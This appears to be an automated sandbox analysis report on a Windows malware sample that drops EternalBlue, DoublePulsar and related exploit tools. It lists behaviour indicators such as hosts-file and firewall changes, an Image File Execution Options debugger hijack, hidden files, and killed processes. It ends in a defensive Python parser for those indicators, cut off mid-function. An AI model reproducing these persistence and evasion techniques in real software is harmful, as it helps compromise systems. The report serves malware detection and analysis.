Analysis
-
max time kernel: 149s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01-06-2024 05:58
Static task: static1
Behavioral task behavioral1: sample 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe, resource win7-20240221-en
Behavioral task behavioral2: sample 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe, resource win10v2004-20240508-en
General
Target: 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
Size: 4.4MB
MD5: 898bbf64f5e0297bdd76cbd9ae5e4b81
SHA1: b978307d7df2d778201fbb6bdf8076ce51b913c2
SHA256: 09a7c474a03954083379dbbe1aed0f2120776688c294ebedb71e3362113e9db2
SHA512: 8a5b8f2d34231dcf056ab7b2216efedaddc6890efd5167cc8ee7611a8036f0c923b41230c5ab7887645ca018c37a8afc6ac4efb32f5abd28f8b928dbf1da6fd3
SSDEEP: 98304:Hv3onZ+azh+78Wftj4puoeuaKhlrH9L7TRZ+ZHJtj/IcikcskwvOC+:wZTzh+wWftLoeghlpzX+ZHTgZwvk
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Blocklisted process makes network request 3 IoCs
flow  pid   Process
105   4960  cscript.exe
254   8052  cscript.exe
1582  5580  cscript.exe
Drops file in Drivers directory 1 IoCs
description                   ioc                                     Process
File opened for modification  C:\Windows\system32\drivers\etc\hosts  cmd.exe
Modifies Windows Firewall 2 TTPs 1 IoCs
pid   Process
3728  netsh.exe
Sets file execution options in registry 2 TTPs 3 IoCs
description      ioc                                                                                                                     Process
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe         reg.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe\debugger = "taskkill.exe"  reg.exe
Key deleted      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe                  reg.exe
Sets file to hidden 1 TTPs 17 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Process: attrib.exe
pids: 3344, 1744, 1276, 5380, 7460, 5336, 7828, 5364, 7292, 7736, 7692, 8080, 7760, 3956, 7944, 6472, 4940
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description        ioc                                                                                    Process
Key value queried  \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation  conhost.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation  Fileftp.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation  898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
Deletes itself 1 IoCs
pid Process 4016 WScript.exe -
Executes dropped EXE 8 IoCs
pid   Process
3340  conhost.exe
928   Fileftp.exe
8084  conhost.exe
5864  Eternalblue-2.2.0.exe
6472  Eternalromance-1.4.0.exe
8040  Eternalchampion-2.0.0.exe
5492  Doublepulsar-1.3.1.exe
6112  Doublepulsar-1.3.1.exe
Loads dropped DLL 64 IoCs
pid Process 5864 Eternalblue-2.2.0.exe 5864 Eternalblue-2.2.0.exe 5864 Eternalblue-2.2.0.exe 5864 Eternalblue-2.2.0.exe 8040 Eternalchampion-2.0.0.exe 8040 Eternalchampion-2.0.0.exe 5864 Eternalblue-2.2.0.exe 8040 Eternalchampion-2.0.0.exe 8040 Eternalchampion-2.0.0.exe 8040 Eternalchampion-2.0.0.exe 8040 Eternalchampion-2.0.0.exe 5864 Eternalblue-2.2.0.exe 8040 Eternalchampion-2.0.0.exe 8040 Eternalchampion-2.0.0.exe 8040 Eternalchampion-2.0.0.exe 5864 Eternalblue-2.2.0.exe 5864 Eternalblue-2.2.0.exe 8040 Eternalchampion-2.0.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 5864 Eternalblue-2.2.0.exe 5864 Eternalblue-2.2.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe -
Modifies file permissions 1 TTPs 17 IoCs
Process: takeown.exe
pids: 1124, 8128, 8144, 7860, 2220, 7708, 5456, 5704, 4372, 2676, 1744, 1520, 5004, 5420, 4796, 2984, 968
resource yara_rule behavioral2/files/0x000700000002340e-23.dat upx behavioral2/memory/928-31-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-126-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-137-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-138-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-140-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-142-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-144-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-146-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-148-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-150-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-152-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-220-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-243-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-245-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-247-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-249-0x0000000000400000-0x0000000000CB0000-memory.dmp upx -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: Fileftp.exe -
Drops file in System32 directory 2 IoCs
description                   ioc                                         Process
File opened for modification  C:\Windows\SysWOW64\wmassrv.dll             attrib.exe
File opened for modification  C:\Windows\SysWOW64\HalPluginsServices.dll  attrib.exe
Drops file in Program Files directory 64 IoCs
description                   ioc                                                    Process
File created                  C:\Program Files\Windowsd\riar.dll                     Fileftp.exe
File created                  C:\Program Files\Windowsd\trch-1.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\Eternalromance-1.4.0.xml     Fileftp.exe
File created                  C:\Program Files\Windowsd\crli-0.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\Esteemaudit-2.1.0.exe        Fileftp.exe
File created                  C:\Program Files\Windowsd\libiconv-2.dll               Fileftp.exe
File created                  C:\Program Files\Windowsd\pcreposix-0.dll              Fileftp.exe
File created                  C:\Program Files\Windowsd\posh.dll                     Fileftp.exe
File opened for modification  C:\Program Files\Windowsd\x64.dll                      conhost.exe
File created                  C:\Program Files\Windowsd\Eternalromance-1.4.0.exe     Fileftp.exe
File created                  C:\Program Files\Windowsd\shellcode.bin                Fileftp.exe
File created                  C:\Program Files\Windowsd\Eternalblue-2.2.0.exe        Fileftp.exe
File created                  C:\Program Files\Windowsd\x86.dll                      conhost.exe
File created                  C:\Program Files\Windowsd\pcre-0.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\445.txt                      Fileftp.exe
File created                  C:\Program Files\Windowsd\Fileftp.exe                  conhost.exe
File opened for modification  C:\Program Files\Windowsd\Fileftp.exe                  conhost.exe
File created                  C:\Program Files\Windowsd\Eternalchampion-2.0.0.xml    Fileftp.exe
File created                  C:\Program Files\Windowsd\tibe.dll                     Fileftp.exe
File created                  C:\Program Files\Windowsd\tibe-1.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\tibe-2.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\xdvl-0.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\Esteemaudittouch-2.1.0.xml   Fileftp.exe
File created                  C:\Program Files\Windowsd\ucl.dll                      Fileftp.exe
File created                  C:\Program Files\Windowsd\Eternalromance-1.3.0.fb      Fileftp.exe
File created                  C:\Program Files\Windowsd\dmgd-1.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\etch-0.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\etchCore-1.x86.dll           Fileftp.exe
File created                  C:\Program Files\Windowsd\libcurl.dll                  Fileftp.exe
File created                  C:\Program Files\Windowsd\tucl.dll                     Fileftp.exe
File created                  C:\Program Files\Windowsd\posh-0.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\trch-0.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\dmgd-4.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\Esteemaudit-2.1.0.xml        Fileftp.exe
File created                  C:\Program Files\Windowsd\etchCore-0.x64.dll           Fileftp.exe
File created                  C:\Program Files\Windowsd\etchCore-1.x64.dll           Fileftp.exe
File created                  C:\Program Files\Windowsd\Eternalblue-2.2.0.xml        Fileftp.exe
File created                  C:\Program Files\Windowsd\libxml2.dll                  Fileftp.exe
File opened for modification  C:\Program Files\Windowsd\Fileftp.exe                  conhost.exe
File created                  C:\Program Files\Windowsd\Eternalromance-1.4.0.fb      Fileftp.exe
File created                  C:\Program Files\Windowsd\Esteemaudit-2.1.0.fb         Fileftp.exe
File created                  C:\Program Files\Windowsd\Eternalblue-2.2.0.fb         Fileftp.exe
File created                  C:\Program Files\Windowsd\riar-2.dll                   Fileftp.exe
File opened for modification  C:\Program Files\Windowsd\log.txt                      Eternalblue-2.2.0.exe
File opened for modification  C:\Program Files\Windowsd\log.txt                      Eternalromance-1.4.0.exe
File created                  C:\Program Files\Windowsd\x64.dll                      conhost.exe
File opened for modification  C:\Program Files\Windowsd\x86.dll                      conhost.exe
File created                  C:\Program Files\Windowsd\x86.dll                      Fileftp.exe
File created                  C:\Program Files\Windowsd\etebCore-2.x64.dll           Fileftp.exe
File created                  C:\Program Files\Windowsd\zlib1.dll                    Fileftp.exe
File opened for modification  C:\Program Files (x86)\Microsoft MSBuild\Setting.exe   attrib.exe
File created                  C:\Program Files\Windowsd\cnli-1.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\coli-0.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\exma-1.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\libeay32.dll                 Fileftp.exe
File created                  C:\Program Files\Windowsd\log.txt                      Eternalchampion-2.0.0.exe
File created                  C:\Program Files\Windowsd\1.txt                        Eternalchampion-2.0.0.exe
File created                  C:\Program Files\Windowsd\ssleay32.dll                 Fileftp.exe
File created                  C:\Program Files\Windowsd\trfo-2.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\x64.dll                      Fileftp.exe
File created                  C:\Program Files\Windowsd\adfw-2.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe       Fileftp.exe
File created                  C:\Program Files\Windowsd\etchCore-0.x86.dll           Fileftp.exe
File created                  C:\Program Files\Windowsd\iconv.dll                    Fileftp.exe
Drops file in Windows directory 13 IoCs
description                   ioc                                Process
File created                  C:\windows\Installer\conhost.exe   898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
File opened for modification  C:\Windows\svchost.exe             attrib.exe
File opened for modification  C:\Windows\debug\lsmos.exe         attrib.exe
File opened for modification  C:\Windows\SpeechsTracing          attrib.exe
File created                  \??\c:\windows\inf\demo1.bat       898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
File opened for modification  C:\Windows\system\lsaus.exe        attrib.exe
File opened for modification  C:\Windows\boy.exe                 attrib.exe
File created                  \??\c:\windows\inf\temp1.bat       898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
File opened for modification  C:\Windows\SecureBootThemes        attrib.exe
File created                  C:\windows\Installer\free.bat      898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
File opened for modification  C:\Windows\splwow64.exe            attrib.exe
File opened for modification  C:\Windows\Fonts\Mysql             attrib.exe
File opened for modification  C:\Windows\sysprepthemes           attrib.exe
Launches sc.exe 64 IoCs
sc.exe is the Windows utility for querying, configuring, creating and deleting services.
pid Process 4864 sc.exe 3688 sc.exe 396 sc.exe 8140 sc.exe 4488 sc.exe 6388 sc.exe 4028 sc.exe 2408 sc.exe 568 sc.exe 4480 sc.exe 1404 sc.exe 752 sc.exe 7892 sc.exe 7848 sc.exe 4968 sc.exe 5392 sc.exe 1868 sc.exe 1276 sc.exe 7960 sc.exe 5636 sc.exe 960 sc.exe 776 sc.exe 2084 sc.exe 4072 sc.exe 1860 sc.exe 4548 sc.exe 4160 sc.exe 760 sc.exe 1624 sc.exe 3208 sc.exe 2932 sc.exe 4084 sc.exe 2956 sc.exe 5412 sc.exe 1268 sc.exe 7944 sc.exe 4332 sc.exe 2324 sc.exe 3528 sc.exe 1416 sc.exe 8056 sc.exe 5348 sc.exe 2352 sc.exe 5664 sc.exe 7964 sc.exe 1940 sc.exe 8204 sc.exe 3988 sc.exe 5644 sc.exe 8080 sc.exe 4396 sc.exe 5372 sc.exe 5480 sc.exe 6576 sc.exe 6392 sc.exe 3024 sc.exe 2636 sc.exe 2544 sc.exe 5212 sc.exe 2328 sc.exe 2060 sc.exe 2160 sc.exe 3200 sc.exe 5644 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8032 schtasks.exe 8092 schtasks.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 7772 ipconfig.exe -
Kills process with WMI 22 IoCs
Process: WMIC.exe
pids: 7880, 7612, 8184, 3212, 4936, 4792, 8016, 7880, 2344, 4932, 7232, 7200, 4504, 1536, 900, 5296, 5328, 5464, 5544, 4480, 6468, 1276
Kills process with taskkill 15 IoCs
Process: taskkill.exe
pids: 7860, 7356, 1512, 2472, 1152, 5408, 1380, 2240, 7020, 5396, 220, 6508, 4792, 3440, 5220
Modifies Internet Explorer settings 1 IoCs
description  ioc                                                                                                    Process
Key deleted  \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLs  Fileftp.exe
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 8116 PING.EXE 2240 PING.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 2676 takeown.exe Token: SeDebugPrivilege 220 taskkill.exe Token: SeTakeOwnershipPrivilege 1124 takeown.exe Token: SeTakeOwnershipPrivilege 2220 takeown.exe Token: SeTakeOwnershipPrivilege 1744 takeown.exe Token: SeDebugPrivilege 7860 taskkill.exe Token: SeIncreaseQuotaPrivilege 8016 WMIC.exe Token: SeSecurityPrivilege 8016 WMIC.exe Token: SeTakeOwnershipPrivilege 8016 WMIC.exe Token: SeLoadDriverPrivilege 8016 WMIC.exe Token: SeSystemProfilePrivilege 8016 WMIC.exe Token: SeSystemtimePrivilege 8016 WMIC.exe Token: SeProfSingleProcessPrivilege 8016 WMIC.exe Token: SeIncBasePriorityPrivilege 8016 WMIC.exe Token: SeCreatePagefilePrivilege 8016 WMIC.exe Token: SeBackupPrivilege 8016 WMIC.exe Token: SeRestorePrivilege 8016 WMIC.exe Token: SeShutdownPrivilege 8016 WMIC.exe Token: SeDebugPrivilege 8016 WMIC.exe Token: SeSystemEnvironmentPrivilege 8016 WMIC.exe Token: SeRemoteShutdownPrivilege 8016 WMIC.exe Token: SeUndockPrivilege 8016 WMIC.exe Token: SeManageVolumePrivilege 8016 WMIC.exe Token: 33 8016 WMIC.exe Token: 34 8016 WMIC.exe Token: 35 8016 WMIC.exe Token: 36 8016 WMIC.exe Token: SeIncreaseQuotaPrivilege 8016 WMIC.exe Token: SeSecurityPrivilege 8016 WMIC.exe Token: SeTakeOwnershipPrivilege 8016 WMIC.exe Token: SeLoadDriverPrivilege 8016 WMIC.exe Token: SeSystemProfilePrivilege 8016 WMIC.exe Token: SeSystemtimePrivilege 8016 WMIC.exe Token: SeProfSingleProcessPrivilege 8016 WMIC.exe Token: SeIncBasePriorityPrivilege 8016 WMIC.exe Token: SeCreatePagefilePrivilege 8016 WMIC.exe Token: SeBackupPrivilege 8016 WMIC.exe Token: SeRestorePrivilege 8016 WMIC.exe Token: SeShutdownPrivilege 8016 WMIC.exe Token: SeDebugPrivilege 8016 WMIC.exe Token: SeSystemEnvironmentPrivilege 8016 WMIC.exe Token: SeRemoteShutdownPrivilege 8016 WMIC.exe Token: SeUndockPrivilege 8016 WMIC.exe Token: SeManageVolumePrivilege 8016 WMIC.exe Token: 33 8016 WMIC.exe Token: 34 8016 WMIC.exe Token: 35 8016 WMIC.exe Token: 36 8016 WMIC.exe Token: 
SeTakeOwnershipPrivilege 8144 takeown.exe Token: SeTakeOwnershipPrivilege 7708 takeown.exe Token: SeBackupPrivilege 928 Fileftp.exe Token: SeSecurityPrivilege 928 Fileftp.exe Token: SeSecurityPrivilege 928 Fileftp.exe Token: SeBackupPrivilege 928 Fileftp.exe Token: SeSecurityPrivilege 928 Fileftp.exe Token: SeBackupPrivilege 928 Fileftp.exe Token: SeSecurityPrivilege 928 Fileftp.exe Token: SeDebugPrivilege 7356 taskkill.exe Token: SeDebugPrivilege 2240 taskkill.exe Token: SeIncreaseQuotaPrivilege 7880 WMIC.exe Token: SeSecurityPrivilege 7880 WMIC.exe Token: SeTakeOwnershipPrivilege 7880 WMIC.exe Token: SeLoadDriverPrivilege 7880 WMIC.exe Token: SeSystemProfilePrivilege 7880 WMIC.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 928 Fileftp.exe 928 Fileftp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4924 wrote to memory of 1976 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 84 PID 4924 wrote to memory of 1976 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 84 PID 4924 wrote to memory of 1976 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 84 PID 4924 wrote to memory of 2920 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 85 PID 4924 wrote to memory of 2920 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 85 PID 4924 wrote to memory of 2920 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 85 PID 4924 wrote to memory of 1860 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 86 PID 4924 wrote to memory of 1860 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 86 PID 4924 wrote to memory of 1860 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 86 PID 4924 wrote to memory of 4788 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 87 PID 4924 wrote to memory of 4788 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 87 PID 4924 wrote to memory of 4788 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 87 PID 4924 wrote to memory of 760 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 88 PID 4924 wrote to memory of 760 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 88 PID 4924 wrote to memory of 760 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 88 PID 4924 wrote to memory of 3452 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 89 PID 4924 wrote to memory of 3452 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 89 PID 4924 wrote to memory of 3452 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 89 PID 4924 wrote to memory of 752 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 93 PID 4924 wrote to memory of 752 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 93 PID 4924 wrote to memory of 752 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 93 PID 4924 wrote to memory of 4192 
4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 94 PID 4924 wrote to memory of 4192 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 94 PID 4924 wrote to memory of 4192 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 94 PID 4924 wrote to memory of 3988 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 95 PID 4924 wrote to memory of 3988 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 95 PID 4924 wrote to memory of 3988 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 95 PID 4924 wrote to memory of 3360 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 97 PID 4924 wrote to memory of 3360 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 97 PID 4924 wrote to memory of 3360 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 97 PID 4924 wrote to memory of 1552 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 101 PID 4924 wrote to memory of 1552 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 101 PID 4924 wrote to memory of 1552 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 101 PID 4924 wrote to memory of 1252 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 102 PID 4924 wrote to memory of 1252 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 102 PID 4924 wrote to memory of 1252 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 102 PID 4924 wrote to memory of 3972 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 103 PID 4924 wrote to memory of 3972 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 103 PID 4924 wrote to memory of 3972 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 103 PID 4924 wrote to memory of 3636 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 104 PID 4924 wrote to memory of 3636 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 104 PID 4924 wrote to memory of 3636 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 104 PID 4924 wrote to memory of 3472 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 
105 PID 4924 wrote to memory of 3472 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 105 PID 4924 wrote to memory of 3472 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 105 PID 4924 wrote to memory of 3540 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 106 PID 4924 wrote to memory of 3540 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 106 PID 4924 wrote to memory of 3540 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 106 PID 4924 wrote to memory of 4404 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 107 PID 4924 wrote to memory of 4404 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 107 PID 4924 wrote to memory of 4404 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 107 PID 4924 wrote to memory of 3488 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 108 PID 4924 wrote to memory of 3488 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 108 PID 4924 wrote to memory of 3488 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 108 PID 1976 wrote to memory of 1292 1976 net.exe 120 PID 1976 wrote to memory of 1292 1976 net.exe 120 PID 1976 wrote to memory of 1292 1976 net.exe 120 PID 4788 wrote to memory of 1876 4788 net.exe 121 PID 4788 wrote to memory of 1876 4788 net.exe 121 PID 4788 wrote to memory of 1876 4788 net.exe 121 PID 3360 wrote to memory of 3952 3360 net.exe 122 PID 3360 wrote to memory of 3952 3360 net.exe 122 PID 3360 wrote to memory of 3952 3360 net.exe 122 PID 4192 wrote to memory of 1284 4192 net.exe 123 -
Views/modifies file attributes 1 TTPs 24 IoCs
Process: attrib.exe
pids: 5336, 7736, 1744, 7944, 8080, 6472, 7924, 3344, 3276, 1884, 4940, 7460, 7008, 8176, 3956, 1276, 2272, 5380, 3972, 7292, 7692, 7828, 7760, 5364
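The file and registry signatures above are flattened "description ioc Process" rows, which is awkward to ingest into a hunt or a blocklist. The Python below is an added example (not part of the sandbox report or of the sample) that parses those rows back into structured records and runs on an excerpt copied from the rows above (the IFEO, System32 and drive-enumeration tables). It also pulls out the detail a responder should act on first: a "debugger" value of taskkill.exe under Image File Execution Options\CrowdtestWatcher.exe makes Windows launch taskkill.exe in place of that program every time it starts, which silently disables it. Function and variable names are my own.

```python
"""Parse the flattened 'description ioc Process' rows of the sandbox
signatures above into structured records (added example; names are my own)."""
import re
from collections import Counter

HEADER = "description ioc Process"

# Row descriptions that appear in the report's file/registry signatures.
DESCRIPTIONS = [
    "File created",
    "File opened for modification",
    "File opened (read-only)",
    "Key created",
    "Key deleted",
    "Key value queried",
    "Set value (str)",
]
_DESC = "|".join(re.escape(d) for d in DESCRIPTIONS)

# description, then the IOC (may contain spaces and quotes), then the acting
# process; the process must be followed by the next description or line end,
# which stops the lazy IOC group from splitting a path at its own '.exe'.
_ROW_RE = re.compile(
    r"(?P<desc>" + _DESC + r")\s+(?P<ioc>.+?)\s+(?P<proc>\S+\.exe)"
    r"(?=\s+(?:" + _DESC + r")\s|\s*$)"
)

# Excerpt copied from the 'Sets file execution options in registry',
# 'Drops file in System32 directory' and 'Enumerates connected drives' rows above.
SAMPLE_ROWS = "\n".join([
    r'description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe\debugger = "taskkill.exe" reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe reg.exe -',
    r"description ioc Process File opened for modification C:\Windows\SysWOW64\wmassrv.dll attrib.exe File opened for modification C:\Windows\SysWOW64\HalPluginsServices.dll attrib.exe -",
    r"description ioc Process File opened (read-only) \??\F: Fileftp.exe -",
])


def parse_ioc_rows(text):
    """Return a list of {'desc', 'ioc', 'proc'} dicts, one per row."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(HEADER):
            line = line[len(HEADER):]
        line = line.rstrip(" -")          # trailing separator left by extraction
        records.extend(m.groupdict() for m in _ROW_RE.finditer(line))
    return records


def by_process(rows):
    """Count how often each (process, description) pair occurs."""
    return Counter((r["proc"], r["desc"]) for r in rows)


def touched_files(rows):
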